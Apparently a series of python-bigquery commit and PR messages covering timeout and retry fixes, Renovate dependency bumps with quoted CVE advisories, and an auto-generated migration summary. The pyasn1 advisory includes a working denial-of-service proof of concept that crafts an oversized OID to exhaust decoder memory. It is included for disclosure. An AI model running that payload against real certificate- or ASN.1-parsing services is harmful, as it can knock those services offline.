`to_arrow()` methods (and their corresponding `*_iterable`,
`*_geodataframe` and `QueryJob` wrappers) in the BigQuery client
library.

This addresses an issue where these methods could hang indefinitely if
the underlying BigQuery Storage API stream blocked (e.g., due to
firewall issues or network interruptions) during the download phase. The
added `timeout` parameter ensures that the download operation respects
the specified time limit and raises a `concurrent.futures.TimeoutError`
if it exceeds the duration.

### Changes

- Modified `google/cloud/bigquery/_pandas_helpers.py`:
  - Updated `_download_table_bqstorage` to accept a `timeout` argument.
  - Implemented a timeout check within the result processing loop.
  - Updated wrapper functions `download_dataframe_bqstorage` and `download_arrow_bqstorage` to accept and pass the `timeout` parameter.
- Modified `google/cloud/bigquery/table.py`:
  - Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`, `to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept and pass `timeout`.
  - Updated `_EmptyRowIterator` methods to match the `RowIterator` signature, preventing `TypeError` when a timeout is provided for empty result sets.
- Modified `google/cloud/bigquery/job/query.py`:
  - Updated `QueryJob` methods (`to_arrow`, `to_dataframe`, `to_geodataframe`) to accept `timeout` and pass it to the result iterator.
- Updated unit tests in `tests/unit/job/test_query_pandas.py`, `tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to reflect the signature changes.

Fixes internal bug: b/468091307
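The timeout check described above can be sketched as a deadline guard around the result processing loop. This is an illustrative sketch only; the names `download_with_timeout` and `pages` are hypothetical and not the library's actual internals:

```python
import concurrent.futures
import time

def download_with_timeout(pages, timeout=None):
    """Yield pages from an iterable, raising concurrent.futures.TimeoutError
    if the overall download runs past `timeout` seconds."""
    deadline = None if timeout is None else time.monotonic() + timeout
    for page in pages:
        # Re-check the deadline on every iteration of the result loop, so a
        # stalled stream raises instead of hanging indefinitely.
        if deadline is not None and time.monotonic() > deadline:
            raise concurrent.futures.TimeoutError(
                f"Download did not complete within {timeout} seconds."
            )
        yield page

# A fast stream finishes normally; a stalled one raises TimeoutError.
print(list(download_with_timeout(iter([1, 2, 3]), timeout=5.0)))  # → [1, 2, 3]
```

The key design point is that the deadline applies to the whole download, not to each individual page, matching the "respects the specified time limit" behavior described above.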
clarify that only jobs.query and jobs.getQueryResults are affected by page_size in query_and_wait (#2349)

Fixes internal issue b/433324499


Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.6.0` → `==2.6.3` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o)
is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

urllib3 can perform decoding or decompression based on the HTTP
`Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`).
When using the streaming API, the library decompresses only the
necessary bytes, enabling partial content consumption.

However, for HTTP redirect responses, the library would read the entire
response body to drain the connection and decompress the content
unnecessarily. This decompression occurred even before any read methods
were called, and configured read limits did not restrict the amount of
decompressed data. As a result, there was no safeguard against
decompression bombs. A malicious server could exploit this to trigger
excessive resource consumption on the client (high CPU usage and large
memory allocations for decompressed data; CWE-409).
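As a rough illustration of the asymmetry such a decompression bomb exploits (a generic sketch using the standard library, not urllib3 code): a few kilobytes of compressed input can force megabytes of allocation on any client that decompresses it transparently.

```python
import gzip

# Highly repetitive data compresses extremely well, so a tiny response
# body can expand enormously when transparently decompressed.
bomb = gzip.compress(b"\x00" * (10 * 1024 * 1024))  # 10 MiB of zeros

print(len(bomb))                   # compressed size: on the order of 10 KB
print(len(gzip.decompress(bomb)))  # → 10485760 bytes allocated by the client
```

This is why draining and decompressing a redirect body before any read limit applies, as described above, left no safeguard on the client side.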

### Affected usages

Applications and libraries using urllib3 version 2.6.2 and earlier to
stream content from untrusted sources by setting `preload_content=False`
when they do not disable redirects.

### Remediation

Upgrade to at least urllib3 v2.6.3 in which the library does not decode
content of redirect responses when `preload_content=False`.

If upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted sources.

---

### Release Notes

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

### [`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07)

[Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3)

- Fixed a high-severity security issue where decompression-bomb safeguards of the streaming API were bypassed when HTTP redirects were followed. ([GHSA-38jv-5279-wg99](https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99))
- Started treating `Retry-After` times greater than 6 hours as 6 hours by default. ([#3743](https://github.com/urllib3/urllib3/issues/3743))
- Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten. ([#3752](https://github.com/urllib3/urllib3/issues/3752))

### [`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11)

[Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2)

- Fixed `HTTPResponse.read_chunked()` to properly handle leftover data in the decoder's buffer when reading compressed chunked responses. ([#3734](https://github.com/urllib3/urllib3/issues/3734))

### [`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08)

[Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1)

- Restore previously removed `HTTPResponse.getheaders()` and `HTTPResponse.getheader()` methods. ([#3731](https://github.com/urllib3/urllib3/issues/3731))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).


Co-authored-by: Anthonios Partheniou <partheniou@google.com>
**Description**

This PR fixes a crash when handling `_InactiveRpcError` during retry
logic and ensures proper `timeout` propagation in
`RowIterator.to_dataframe`.

**Fixes**

**Retry Logic Crash**: Addressed an issue in
`google/cloud/bigquery/retry.py` where `_should_retry` would raise a
`TypeError` when inspecting unstructured `gRPC` errors (like
`_InactiveRpcError`). The fix adds robust error inspection to fall back gracefully when `exc.errors` is not subscriptable.

**Timeout Propagation**: Added the missing `timeout` parameter to
`RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`. This
ensures that the user-specified `timeout` is correctly passed down to
the underlying `to_arrow` call, preventing the client from hanging
indefinitely when the Storage API is unresponsive.

**Changes**

- Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to handle `TypeError` and `KeyError` when accessing `exc.errors`.
- Modified `google/cloud/bigquery/table.py`: Updated the `RowIterator.to_dataframe` signature and implementation to accept and pass the `timeout` parameter.

The first half of this work was completed in PR #2354
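The "robust error inspection" idea can be sketched as follows. This is a hypothetical stand-in, not the actual code in `google/cloud/bigquery/retry.py`; `get_reason` and the toy exception classes exist only for illustration:

```python
def get_reason(exc):
    """Best-effort lookup of a structured error 'reason'; returns None when
    `exc.errors` is missing, not subscriptable, or not a list of dicts."""
    try:
        return exc.errors[0]["reason"]
    except (AttributeError, TypeError, KeyError, IndexError):
        return None

class StructuredApiError(Exception):
    # Shaped like a google-api-core exception: a list of error dicts.
    errors = [{"reason": "rateLimitExceeded"}]

class InactiveRpcLikeError(Exception):
    # Unstructured gRPC-style error: `errors` is not subscriptable.
    errors = None

print(get_reason(StructuredApiError()))    # → rateLimitExceeded
print(get_reason(InactiveRpcLikeError()))  # → None
```

Catching `TypeError`/`KeyError` (rather than assuming a list of dicts) is what prevents the crash when a raw `_InactiveRpcError` reaches the retry predicate.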
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [geopandas](https://redirect.github.com/geopandas/geopandas) | `==1.1.1` → `==1.1.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662)

SQL injection vulnerability in geopandas before v1.1.2 allows an attacker to obtain sensitive information via the `to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database.

---

### Release Notes

<details>
<summary>geopandas/geopandas (geopandas)</summary>

### [`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025)

[Compare Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2)

Bug fixes:

- Fix an issue that caused an error in `GeoDataFrame.from_features` when there is no `properties` field ([#3599](https://redirect.github.com/geopandas/geopandas/issues/3599)).
- Fix `read_file` and `to_file` errors ([#3682](https://redirect.github.com/geopandas/geopandas/issues/3682)).
- Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#3640](https://redirect.github.com/geopandas/geopandas/issues/3640)).
- `value_counts` on GeoSeries now preserves CRS in index ([#3669](https://redirect.github.com/geopandas/geopandas/issues/3669)).
- Fix f-string placeholders appearing in error messages when `pyogrio` cannot be imported ([#3682](https://redirect.github.com/geopandas/geopandas/issues/3682)).
- `.to_json` now provides a clearer error message when called on a GeoDataFrame without an active geometry column ([#3648](https://redirect.github.com/geopandas/geopandas/issues/3648)).
- Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if there are no geometry columns left in the dataframe ([#3648](https://redirect.github.com/geopandas/geopandas/issues/3648)).
- Fix SQL injection in `to_postgis` via geometry column name ([#3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq)

### Summary

A review of pyasn1 v0.6.1 found a denial-of-service issue: a malformed RELATIVE-OID with excessive continuation octets leads to memory exhaustion.

### Details

The integer issue can be found in the decoder as `reloid += ((subId <<
7) + nextSubId,)`:
https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496
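A simplified model of base-128 sub-identifier decoding (an illustrative sketch, not pyasn1's actual implementation) shows why unbounded continuation octets are dangerous: each octet with the high bit set contributes 7 more payload bits, so N continuation octets build an integer of roughly 7·N bits.

```python
def decode_subidentifier(octets: bytes) -> int:
    """Decode one BER base-128 sub-identifier: accumulate 7 payload bits per
    octet until an octet with the continuation bit (0x80) clear is seen."""
    value = 0
    for b in octets:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:  # high bit clear: last octet of this sub-identifier
            break
    return value

# 0x81 = continuation bit + payload 1; a thousand of them plus a terminating
# 0x00 yield a ~7000-bit integer from barely 1 KB of input.
big = decode_subidentifier(b"\x81" * 1000 + b"\x00")
print(big.bit_length())  # → 7001
```

Scaled up to the megabyte payloads in the PoC below, this per-octet bit growth is what exhausts memory.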

### PoC

For the DoS:
```py
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set memory limit to display PoC
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except Exception:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])

print(f"[*] Testing with {payload_size_mb}MB payload...")

payload_size = payload_size_mb * 1024 * 1024

# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 bytes can handle up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload

print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())

    print(f'[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')

    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print(f'[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')

except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')

print("\n[*] Test completed")
```

Screenshots with the results:

#### DoS
<img width="944" height="207" alt="Screenshot_20251219_160840"
src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f"
/>

<img width="931" height="231" alt="Screenshot_20251219_152815"
src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa"
/>

#### Leak analysis

A potential heap leak was investigated but came back clean:
```
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin

[*] First 64 bytes (hex):
  01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081

[*] First 64 bytes (ASCII/hex dump):
  0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @..... @..
  0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @..... @....
  0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @..... @..... 
  0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @..... @..... @.

[*] Digit distribution analysis:
  '0':  10.1%
  '1':   9.9%
  '2':  10.0%
  '3':   9.9%
  '4':   9.9%
  '5':  10.0%
  '6':  10.0%
  '7':  10.0%
  '8':   9.9%
  '9':  10.1%
```

### Scenario

1. An attacker creates a malicious X.509 certificate.
2. The application validates certificates.
3. The application accepts the malicious certificate and tries to decode it, resulting in the issues described above.

### Impact

This issue can cause excessive resource consumption and hang systems or stop services.
This may affect:
- LDAP servers
- TLS/SSL endpoints
- OCSP responders
- etc.

### Recommendation

Add a limit to the allowed bytes in the decoder.

---

### Release Notes

<details>
<summary>pyasn1/pyasn1 (pyasn1)</summary>

### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026)

[Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2)

- CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007)
- Added support for Python 3.14 ([pr #97](https://redirect.github.com/pyasn1/pyasn1/pull/97))
- Added SECURITY.md policy
- Fixed unit tests failing due to missing code ([issue #91](https://redirect.github.com/pyasn1/pyasn1/issues/91), [pr #92](https://redirect.github.com/pyasn1/pyasn1/pull/92))
- Migrated to pyproject.toml packaging ([pr #90](https://redirect.github.com/pyasn1/pyasn1/pull/90))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release.

Librarian Version: v0.8.0
Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.40.1</summary>

## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12)

### Bug Fixes

* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d))

* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20))

### Documentation

* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))

</details>
… into migration.python-bigquery.migration.2026-03-02_16-59-45.migrate
@gemini-code-assist
Contributor

Summary of Changes

Hello, I'm Gemini Code Assist! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request completes a significant architectural change by migrating the Google Cloud BigQuery Python client library into a dedicated package directory. This restructuring aims to consolidate the project's codebase, streamline its development lifecycle, and integrate it more effectively into a monorepo environment. The migration includes all source code, documentation, and continuous integration configurations, ensuring that the package is fully functional and independently manageable within its new location.

Highlights

  • Repository Migration: The entire google-cloud-bigquery Python client library, along with its associated tooling and documentation, has been migrated into a new packages/google-cloud-bigquery directory within the repository.
  • Infrastructure Setup: New GitHub workflows, Kokoro CI/CD configurations, pre-commit hooks, and code ownership definitions have been established to support the new package structure and ensure consistent development practices.
  • Documentation Relocation: All project-level documentation, including README.rst, CONTRIBUTING.rst, LICENSE, SECURITY.md, TROUBLESHOOTING.md, UPGRADING.md, and CODE_OF_CONDUCT.md, has been moved to reside within the new package directory.
  • Core Library and Benchmarks: The complete google.cloud.bigquery Python package, including its submodules and benchmark scripts, has been relocated as part of this migration.
Changelog
  • packages/google-cloud-bigquery/.coveragerc
    • Added coverage configuration file.
  • packages/google-cloud-bigquery/.flake8
    • Added flake8 linting configuration.
  • packages/google-cloud-bigquery/.github/CODEOWNERS
    • Added GitHub CODEOWNERS file for the package.
  • packages/google-cloud-bigquery/.github/CONTRIBUTING.md
    • Added contributing guidelines for the package.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/bug_report.md
    • Added bug report issue template.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/feature_request.md
    • Added feature request issue template.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/support_request.md
    • Added support request issue template.
  • packages/google-cloud-bigquery/.github/PULL_REQUEST_TEMPLATE.md
    • Added pull request template.
  • packages/google-cloud-bigquery/.github/auto-label.yaml
    • Added auto-label configuration for pull requests.
  • packages/google-cloud-bigquery/.github/blunderbuss.yml
    • Added blunderbuss configuration for issue and PR assignments.
  • packages/google-cloud-bigquery/.github/header-checker-lint.yml
    • Added header checker lint configuration.
  • packages/google-cloud-bigquery/.github/workflows/docs.yml
    • Added GitHub Actions workflow for documentation builds.
  • packages/google-cloud-bigquery/.github/workflows/unittest.yml
    • Added GitHub Actions workflow for unit tests across Python versions.
  • packages/google-cloud-bigquery/.gitignore
    • Added git ignore file for common development artifacts.
  • packages/google-cloud-bigquery/.kokoro/build.sh
    • Added Kokoro build script.
  • packages/google-cloud-bigquery/.kokoro/continuous/common.cfg
    • Added common configuration for continuous Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/continuous/continuous.cfg
    • Added continuous Kokoro build configuration.
  • packages/google-cloud-bigquery/.kokoro/continuous/prerelease-deps-3.13.cfg
    • Added prerelease dependencies configuration for Python 3.13 on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/continuous/unit-tests-misc.cfg
    • Added miscellaneous unit test configuration for continuous Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/populate-secrets.sh
    • Added script to populate secrets for Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg
    • Added common configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/linting-typing.cfg
    • Added linting and typing configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/prerelease-deps.cfg
    • Added prerelease dependencies configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/snippets-3.13.cfg
    • Added snippets configuration for Python 3.13 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/snippets-3.9.cfg
    • Added snippets configuration for Python 3.9 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/system-3.13.cfg
    • Added system test configuration for Python 3.13 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/system-3.9.cfg
    • Added system test configuration for Python 3.9 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/common.cfg
    • Added common linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/continuous.cfg
    • Added continuous linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/periodic.cfg
    • Added periodic linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/presubmit.cfg
    • Added presubmit linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/common.cfg
    • Added common Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/continuous.cfg
    • Added continuous Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic-head.cfg
    • Added periodic-head Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic.cfg
    • Added periodic Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/presubmit.cfg
    • Added presubmit Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/common.cfg
    • Added common Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/continuous.cfg
    • Added continuous Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic-head.cfg
    • Added periodic-head Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic.cfg
    • Added periodic Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/presubmit.cfg
    • Added presubmit Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/common.cfg
    • Added common Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/continuous.cfg
    • Added continuous Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic-head.cfg
    • Added periodic-head Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic.cfg
    • Added periodic Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/presubmit.cfg
    • Added presubmit Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/common.cfg
    • Added common Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/continuous.cfg
    • Added continuous Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic-head.cfg
    • Added periodic-head Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic.cfg
    • Added periodic Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/presubmit.cfg
    • Added presubmit Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/common.cfg
    • Added common Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/continuous.cfg
    • Added continuous Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic-head.cfg
    • Added periodic-head Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic.cfg
    • Added periodic Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/presubmit.cfg
    • Added presubmit Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/common.cfg
    • Added common Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/continuous.cfg
    • Added continuous Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic-head.cfg
    • Added periodic-head Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic.cfg
    • Added periodic Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/presubmit.cfg
    • Added presubmit Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh
    • Added script for testing samples against head on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh
    • Added implementation script for testing samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples.sh
    • Added main script for testing samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/trampoline.sh
    • Added trampoline script for Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/trampoline_v2.sh
    • Added version 2 trampoline script for Kokoro builds.
  • packages/google-cloud-bigquery/.librarian/state.yaml
    • Added librarian state configuration.
  • packages/google-cloud-bigquery/.pre-commit-config.yaml
    • Added pre-commit configuration for linting and formatting.
  • packages/google-cloud-bigquery/.repo-metadata.json
    • Added repository metadata file.
  • packages/google-cloud-bigquery/.trampolinerc
    • Added trampoline configuration file.
  • packages/google-cloud-bigquery/CODE_OF_CONDUCT.md
    • Added code of conduct document.
  • packages/google-cloud-bigquery/CONTRIBUTING.rst
    • Added contributing guidelines document.
  • packages/google-cloud-bigquery/LICENSE
    • Added Apache 2.0 license file.
  • packages/google-cloud-bigquery/MANIFEST.in
    • Added manifest file for package distribution.
  • packages/google-cloud-bigquery/README.rst
    • Added main README file for the package.
  • packages/google-cloud-bigquery/SECURITY.md
    • Added security policy document.
  • packages/google-cloud-bigquery/TROUBLESHOOTING.md
    • Added troubleshooting guide.
  • packages/google-cloud-bigquery/UPGRADING.md
    • Added upgrading guide for major library versions.
  • packages/google-cloud-bigquery/benchmark/README.md
    • Added README for BigQuery benchmark scripts.
  • packages/google-cloud-bigquery/benchmark/benchmark.py
    • Added Python script for BigQuery benchmarking.
  • packages/google-cloud-bigquery/benchmark/queries.json
    • Added JSON file containing benchmark queries.
  • packages/google-cloud-bigquery/docs/.gitignore
    • Added gitignore for documentation build artifacts.
  • packages/google-cloud-bigquery/docs/README.rst
    • Added README for documentation, linking to main README.
  • packages/google-cloud-bigquery/docs/UPGRADING.md
    • Added UPGRADING document for documentation, linking to main UPGRADING.
  • packages/google-cloud-bigquery/docs/_static/custom.css
    • Added custom CSS for Sphinx documentation styling.
  • packages/google-cloud-bigquery/docs/_templates/layout.html
    • Added custom layout template for Sphinx documentation, including Python 2 EOL warning.
  • packages/google-cloud-bigquery/docs/bigquery/legacy_proto_types.rst
    • Added reStructuredText document for legacy proto-based types.
  • packages/google-cloud-bigquery/docs/bigquery/standard_sql.rst
    • Added reStructuredText document for standard SQL types.
  • packages/google-cloud-bigquery/docs/changelog.md
    • Added changelog document for documentation, linking to main CHANGELOG.
  • packages/google-cloud-bigquery/docs/conf.py
